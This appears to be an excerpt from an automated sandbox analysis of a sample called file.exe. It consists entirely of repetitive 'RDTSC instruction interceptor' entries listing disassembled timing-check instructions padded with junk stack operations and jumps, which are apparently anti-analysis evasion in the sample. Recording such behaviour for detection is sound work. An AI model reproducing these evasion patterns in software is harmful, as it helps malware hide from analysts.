                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD76DF second address: BD76E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD76E3 second address: BD7718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9B11D984Ah 0x00000010 jmp 00007FB9B11D9857h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7718 second address: BD771C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6C20 second address: BD6C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9B11D9856h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6C56 second address: BD6C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6C5A second address: BD6C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7A89 second address: BD7AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9B1005724h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7D2F second address: BD7D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D984Bh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7D41 second address: BD7D5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005728h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD801A second address: BD8020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8020 second address: BD802D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC4BD second address: BDC4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC4C3 second address: BDC4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC4CC second address: BDC4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC4D0 second address: BDC4EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9B1005724h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC4EE second address: BDC4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE245B second address: BE2463 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2463 second address: BE2473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B11D984Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE29F8 second address: BE2A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB9B1005716h 0x0000000a jmp 00007FB9B100571Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2B3E second address: BE2B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2F15 second address: BE2F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FB9B1005716h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2F21 second address: BE2F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2F2E second address: BE2F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE359D second address: BE35AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB9B11D9846h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE35AE second address: BE35B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE777 second address: BEE77D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE77D second address: BEE797 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B1005720h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE93A second address: BEE956 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9B11D984Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB9B11D9846h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE956 second address: BEE95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE95A second address: BEE972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D984Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE972 second address: BEE976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE976 second address: BEE97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F11C second address: B9F120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F120 second address: B9F12E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FB9B11D9846h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEEC51 second address: BEEC5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB9B1005716h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEEDF5 second address: BEEDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2920 second address: BF2935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B1005721h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6DE5 second address: BF6DEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6DEB second address: BF6DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FB9B1005716h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5FD0 second address: BF5FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6668 second address: BF667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005721h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF667D second address: BF6683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6683 second address: BF6687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF67E6 second address: BF6849 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9B11D9846h 0x00000008 jmp 00007FB9B11D9851h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 je 00007FB9B11D984Ah 0x00000017 push edx 0x00000018 pop edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007FB9B11D9850h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FB9B11D984Eh 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FB9B11D9846h 0x00000031 jmp 00007FB9B11D9852h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF698D second address: BF6991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6991 second address: BF6997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6997 second address: BF69A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB9B1005716h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF69A7 second address: BF69AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF69AB second address: BF69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDFE8 second address: BFDFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jng 00007FB9B11D9846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFE8DF second address: BFE8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF229 second address: BFF250 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9B11D984Fh 0x0000000d jmp 00007FB9B11D9850h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04BEC second address: C04BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04BF5 second address: C04C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08D40 second address: C08D5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9B1005724h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E19 second address: C07E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E22 second address: C07E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07E26 second address: C07E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07FDA second address: C07FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B100571Fh 0x00000009 jmp 00007FB9B100571Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07FF8 second address: C08008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08008 second address: C0800C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0814D second address: C08175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9852h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B11D984Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08175 second address: C0817A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C082AF second address: C082D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9B11D9857h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08431 second address: C0843B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9B1005716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085AA second address: C085B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007FB9B11D9846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085B8 second address: C085CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FB9B1005716h 0x0000000f jns 00007FB9B1005716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085CF second address: C085E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB9B11D984Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085E3 second address: C085E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C085E7 second address: C085ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08766 second address: C0876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0876A second address: C08770 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0890A second address: C08910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A50 second address: C08A69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB9B11D984Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A69 second address: C08A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A6D second address: C08A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FC3D second address: C0FC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB9B1005727h 0x0000000a jmp 00007FB9B100571Ch 0x0000000f jmp 00007FB9B1005724h 0x00000014 popad 0x00000015 push edi 0x00000016 jmp 00007FB9B1005721h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDD1 second address: C0FDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDDB second address: C0FDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDE1 second address: C0FDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDE6 second address: C0FDFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9B1005720h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDFB second address: C0FE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9856h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C100FF second address: C10113 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FB9B1005716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FB9B1005716h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10113 second address: C10131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB9B11D9846h 0x00000011 ja 00007FB9B11D9846h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C102BE second address: C102C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10402 second address: C1041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FB9B11D9853h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1041C second address: C10426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB9B1005716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C105A0 second address: C105BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9855h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C105BB second address: C105DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FB9B100571Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FB9B1005716h 0x00000014 jnc 00007FB9B1005716h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1073A second address: C10740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10740 second address: C10744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10744 second address: C1074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1074A second address: C1076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FB9B1005720h 0x00000010 js 00007FB9B1005716h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1076E second address: C10775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10775 second address: C1077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C108D8 second address: C108DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C108DE second address: C108FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007FB9B1005716h 0x0000000d pop edi 0x0000000e je 00007FB9B100571Eh 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007FB9B1005716h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1139C second address: C113A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F828 second address: C0F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18684 second address: C18688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18688 second address: C1869B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B100571Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1869B second address: C186BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B11D985Dh 0x00000008 jmp 00007FB9B11D984Ch 0x0000000d jmp 00007FB9B11D984Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18218 second address: C1821E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1821E second address: C18224 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
